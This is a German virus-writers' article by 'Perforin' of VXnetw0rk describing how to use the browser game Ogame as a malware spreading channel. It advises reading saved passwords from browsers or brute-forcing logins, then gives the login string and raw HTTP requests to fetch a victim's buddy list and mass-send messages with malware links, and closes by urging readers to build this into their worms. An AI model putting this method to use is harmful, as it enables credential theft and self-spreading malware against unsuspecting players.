-=x=-=x=-=x=-=x=-=x=-=x=-=x=-=x=-=x=-=x=-=x=-=x=-=x=-=x=-=x=--
-=x=-=x=-=x=-=x=-=x=- Ogame als Spreader -=x=-=x=-=x=-=x=-=x=-
-=x=-=x=-=x=-=x=-=x=-=x=-=x=-=x=-=x=-=x=-=x=-=x=-=x=-=x=-=x=--
                                       by Perforin [VXnetw0rk]
									   
									   
Die meisten von euch werden Ogame sicher kennen, oder sogar selber zocken. Wers nicht kennt, Ogame ist eine Wirtschafts
und Kriegssimulation als Browserspiel.Dabei kämpft man halt gegen andere Spieler und versucht zu überleben.
Das nette daran ist, dass Ogame ein ingame Nachrichtensystem hat. Auch gibt es eine Buddy Liste,welche Mitspieler
beeinhaltet mit denen man häufig Kontakt hat.Und genau hier können wir ansetzen. Man könnte die ingame Nachrichten dazu
verwenden, Links zur Malware zu verschicken.
 
Ich hab mir das ganze einmal angesehen und den login kann man schonmal notfalls bruten, wenn man das Passwort nicht
aus der Firefox,IE,Opera etc Datenbank auslesen kann. Der wichtige String der gesendet werden muss ist folgender:
uni_id=[UNI]&v=2&is_utf8=0&uni_url=[UNI-URL]&login=[USER]&pass=[PASS]&submitInput=Login

Wenn man nun eingeloggt ist, ruft man dann zuerst die Buddy Liste auf, diese wird uns gzip komprimiert übermittelt.
Das heisst, wir müssen diese zuerst dekomprimieren, ehe wir etwas mit den Daten anfangen können.
Die GET Anfrage sieht so aus:
 
GET /game/index.php?page=buddies&session=[Session-ID]&ajax=1&height=500&width=770& HTTP/1.1
User-Agent: Opera/9.80 (Windows NT 5.1; U; de) Presto/2.5.24 Version/10.53
Host:[UNI-URL]
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: de-DE,de;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
Referer: [UNI-URL] /game/index.php?page=overview&session=[Session-ID]&lgn=1
Cookie: [Cookie-ID]
Cookie2: $Version=1
Connection: Keep-Alive, TE
TE: deflate, gzip, chunked, identity, trailers


Die Antwort bekommen wir wie schon gesagt, gzip komprimiert. Die nötigen Usernamen stehen zwischen TD Feldern.
Orientieren können wir uns Gottseidank an einem TD Feld direkt über dem eigentlichen Nutzernamen.
Denn dort steht das TD Feld mit class="no" und einer Nummer.

Jetzt müssen wir also nur noch die Usernamen auslesen und zwischenspeichern. Denn nun, navigieren wir zum
Nachricht versenden. Diesmal müssen wir eine POST Anfrage versenden. Die schaut wie folgt aus:

POST /game/index.php?page=messages&session=[Session-ID]&to=[Ominöse Zahl] HTTP/1.1
User-Agent: Opera/9.80 (Windows NT 5.1; U; de) Presto/2.5.24 Version/10.53
Host: [UNI-URL]
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: de-DE,de;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
Referer: [UNI-URL] /game/index.php?page=writemessage&session=[Session-ID]&to=[Ominöse Zahl]&ajax=1&height=500&width=770&
Cookie: [Cookie-ID]
Cookie2: $Version=1
Connection: Keep-Alive, TE
TE: deflate, gzip, chunked, identity, trailers
Content-Length: [Content Länge]
Content-Type: application/x-www-form-urlencoded

betreff=[Betreff]&text=[Text]


Die Post Anfrage müssen wir dann nur für jeden Buddy in der Liste versenden und schon werden unsere Nachrichten 
versendet! Somit hätten wir eine neue Spreading Methode geschaffen welche wohl sehr gut funktionieren würde. 
Natürlich könnte man auch einfach nur damit rumspammen x)
Was diese Ominöse Zahl angeht, kann es sein, dass diese Zahl die UserID des Buddys ist. Bin mir da aber noch 
nicht ganz sicher!


Tja, mehr gibs dazu glaub ich nicht zu sagen? Ran an den Speck und coded diese neue Methode in eure Würmer!

mfg Perforin
www.virii.lu
VXnetw0rk